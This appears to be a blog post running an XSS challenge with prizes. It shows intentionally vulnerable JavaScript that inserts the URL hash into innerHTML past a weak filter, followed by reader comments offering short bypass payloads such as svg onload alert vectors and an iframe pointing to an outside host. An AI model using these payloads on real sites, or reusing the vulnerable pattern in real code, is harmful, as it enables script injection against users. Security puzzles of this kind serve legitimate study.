I’m a big fan of XSS and to make my new website more visible to the infosec guys I’m offering two Amazon gift cards.
The first correct solution will have a $50 Amazon Gift card. The second one will receive $25 Amazon Gift card.
The rules are simple (like the challenge). Show a alert box in the following vulnerable code with a message containing the word xss.
[code lang=”html”]
<script>
function go()
{
var w = location.hash;
w = w.replace(/[‘", ]+/g, "");
document.getElementById("say").innerHTML = w.substring(0,26);
}
</script>
<div id="say"></div>
<a onclick="go()">Say it</a> [/code]
Rules:
- You can’t use some of the chars represented in the w.replace line of code
- You can only use Chrome, Firefox, Opera, Internet Explorer or Safari latest versions
- XSS vector must be less or equal to 26 chars long
- When commenting your entry use the [ code]code[ /code] to write your code (without the leading space)
The challenge will end on 19 august at midnight. All the solutions must be added in this post comments.
All the comments will be inactive until the challenge finishes.
UPDATE: I’ll give a bonus to the user who replies with the most creative XSS.
Good luck! Happy hunting 🙂
Double post, probably chars were stripped from blog comments code. You should decode it before trying, anyway [code]#<svg/onload=alert(`xss`)>[/code] tested on firefox 😀
[code]#<svg/onload=alert(/xss/)>[/code]
[code]#<svg/onload=alert`xss`>[/code] (Works on MS Edge, Win10)
Oh, also works on FF34+ (incl. latest). Not sure if Edge is allowed ^^
[code]#<p/onclick=alert(/xss/)>a[/code]
We could use the following payload to execute an alert with the word XSS , simple but effective ^^
[code]<svg/onload=alert(/XSS/)>[/code]
Tested on Firefox 40.0
Have fun 🙂
This works (if you click on the big “a”):
[code]<h1/onclick=alert(1)>a[/code]
[code]")}alert(/XSS/);{//[/code]
http://jsfiddle.net/Lk41g897/1/
[code]function go()
{
var w = location.hash;
w = w.replace(/[‘", ]+/g, "");
document.getElementById("" onclick=alert(1)//*/alert(1)//").innerHTML = w.substring(0,26);
}
<div id=""; onclick=alert(1)//*/alert(1)// ">;
<a>" onclick=alert(1)//*/alert(1)// ‘ </a>[/code]
[code]<svg/onload=alert(`xss`)>[/code]
[code]<svg/onload=alert(/xss/)>[/code]
Works on latest Firefox.
[code]<svg/onload=alert`xss`>[/code]
Tested on latest ff
[code]<iframe/src=//14.rs>[/code]
Tested ff
[code]#<svg/onload=alert(/xss/)>[/code]
[code]<svg><script>/<@/>alert(1)</script>[/code]
Browser: Firefox
Os: Windows
[code]<1/<svg/onload=alert`1`;>[/code]
works on Microsoft Edge